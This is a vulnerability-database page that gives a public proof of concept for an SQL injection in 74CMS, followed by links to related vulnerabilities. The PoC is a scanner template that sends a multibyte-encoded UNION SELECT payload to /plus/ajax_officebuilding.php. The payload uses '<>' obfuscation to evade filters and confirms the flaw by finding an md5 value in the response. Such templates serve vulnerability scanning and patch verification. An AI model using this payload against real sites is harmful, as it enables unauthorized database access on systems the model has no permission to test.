74cms-sqli-2: 74 CMS SQL 注入漏洞

漏洞描述

PoC代码[已公开]

id: 74cms-sqli-2

info:
  name: 74 CMS SQL 注入漏洞
  author: rexus
  severity: high
  verified: true
  description: 74cms-sqli-2 app="骑士-74CMS"
  reference:
    - https://www.uedbox.com/post/30019/

set:
    rand: randomInt(200000000, 210000000)
rules:
    r0:
        request:
            method: GET
            path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
        expression: response.body.bcontains(bytes(md5(string(rand))))
expression: r0()

相关漏洞推荐

• 74cms-ajax-personal-controller-class-php-sqlinject: 74 CMS 5.0.1 SQL 注入漏洞 POC

  2025-09-01 | 74 CMS
  74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入漏洞 app="骑士-74CMS"

• 74cms-sqli-1: 74 CMS SQL 注入漏洞 POC

  2025-09-01 | 74 cms
  74cms-sqli-1 app="骑士-74CMS"

• 74CMS CVE-2020-22209 SQL注入漏洞 无POC

  2024-07-18 | 74 CMS
  74CMS存在SQL注入漏洞，此漏洞是由于应用程序对'query'参数数据验证不足导致的。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...